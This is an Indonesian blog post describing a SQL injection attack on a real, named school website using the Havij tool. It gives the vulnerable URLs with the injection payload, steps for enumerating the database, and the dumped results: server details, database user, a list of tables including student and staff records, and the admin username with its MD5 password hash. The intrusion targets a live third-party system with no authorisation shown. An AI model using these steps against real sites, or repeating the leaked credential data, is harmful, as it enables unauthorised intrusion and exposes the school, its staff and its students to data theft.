http://smpn18bkl.sch.id/berita.php?id=-1 atau yang telah saya trobos lebih dalam lagi http://smpn18bkl.sch.id/berita.php?p=lengkap&id=1'
hilangkan tanda – untuk yang pertama dan ‘ untuk yang kedua dan tampak seperti di gambar untuk sql injection menggunakan havij
Lalu setelah memasukan web url klik analyze tunggu sampai selesai.
Setelah selesai anda buka menu info dan klik get dan tunggu hingga selesai, jika
selesai maka informasi yang kita dapatkan adalahTarget: http://smpn18bkl.sch.id/berita.php?p=lengkap&id=1'
Host IP: 49.156.21.35
Web Server: Apache
Powered-by: PHP/5.2.17
DB Server: MySQL
Resp. Time(avg): 128 ms
Current User: smpn18bk_userdb@localhost
Sql Version: 5.0.96-communityCurrent DB: smpn18bk_dbase
System User: smpn18bk_userdb@localhost
Host Name: pasai.magnethost.asia
Installation dir: /
DB User: 'smpn18bk_userdb'@'localhost'
Data Bases: information_schema
smpn18bk_dbase
Data Bases: information_schema
smpn18bk_dbase
Selanjutnya adalah klik tables untuk mendapatkan informasi dari database
smpn18bk_dbase
Pertama-tama adalah klik get dbs untuk mendapatkan nama database, selanjutnya
adalah Untuk mencari tables anda centang table smpn18bk_base klik get tablessetelah itu maka akan muncul tables lebih detail lihat gambar.
Hasil keseluruhan isi database :
siswaprofil
pengumuman
pegawai_str
nilai
mapel
kelas
kategori_galeri
kategori_berita
kaldik
guru_staf
galeri
bukutamu
beritaagenda
admin
Setelah itu kita centang tables admin lalu klik get coloums untuk mendapatkan
username, password, id dan setelah itu akan muncul password dalam bentuk md5,username, id centang semua dan klik get data.
Hasil dari gambar dump tables admin tersebut dari havij
Dan dapat hasil sebagai berikut
Username : adminPassword dalam bentuk md5 : 25f9e794323b453885f5181f1b624d0b
Tidak ada komentar:
Posting Komentar